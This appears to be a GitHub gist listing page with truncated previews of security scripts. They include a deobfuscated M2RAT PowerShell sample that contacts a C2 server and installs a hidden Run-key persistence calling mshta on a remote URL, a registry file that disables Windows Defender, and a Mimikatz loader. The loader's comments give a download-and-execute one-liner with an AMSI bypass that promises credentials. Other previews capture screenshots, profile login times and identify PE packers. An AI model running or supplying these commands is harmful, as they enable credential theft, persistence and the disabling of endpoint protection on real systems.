View M2RAT.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Deobfuscated M2RAT | |
# Refer: https://asec.ahnlab.com/en/56857/ | |
Start-Sleep -Seconds 68; | |
$buffer = 1024 * 1024; | |
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME; | |
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid; | |
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw'; | |
if (!(Test-Path$TEMPORARY_FILE)) { | |
New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force; | |
} |
View shodan-query.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View youtube-summarizer-with-langchain-chatgpt.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View shinolang.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View DisableWindowsDefender2022.reg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] | |
"DisableAntiSpyware"=dword:00000001 | |
"DisableRealtimeMonitoring"=dword:00000001 | |
"DisableAntiVirus"=dword:00000001 | |
"DisableSpecialRunningModes"=dword:00000001 | |
"DisableRoutinelyTakingAction"=dword:00000001 | |
"ServiceKeepAlive"=dword:00000000 |
View Invoke-OneShot-Mimikatz.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Confirm it works in Windows 10 2022 | |
# Dont download this but execute the next line in command prompt(cmd.exe) | |
# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content | |
# You will get creds | |
# | |
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021) | |
# https://payatu.com/blog/arun.nair/amsi-bypass | |
$code = @" | |
using System; |
View ScreenShot.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Reflection.Assembly]::LoadWithPartialName("System.Drawing") | |
function screenshot([Drawing.Rectangle]$bounds, $path) { | |
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height | |
$graphics = [Drawing.Graphics]::FromImage($bmp) | |
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) | |
$bmp.Save($path) | |
$graphics.Dispose() |
View Get-ActiveTime.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Initialize | |
$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday") | |
$LoginData=@{} | |
ForEach($w in $Weekday){ | |
$LoginData[$w]=@{} | |
0..23 | % {$LoginData[$w][$_]=0} | |
} | |
#Get the data from Eventlog | |
$i=0 |
View ip2geo.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Bulk IP Address 2 Geolocation Using freegeoip.net | |
#Input: IP Address List | |
#Output: IP, Latitude, Longitude (CSV Format) | |
import urllib, json | |
#Paste your ipaddress list | |
ips=""" |
View pefile_peid.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import peutils | |
import pefile | |
try: | |
pe = pefile.PE(sys.argv[1]) | |
signatures = peutils.SignatureDatabase('./sig/userdb.txt') | |
matches = signatures.match_all(pe, ep_only = True) | |
if type(matches) is list: | |
for m in matches: |
NewerOlder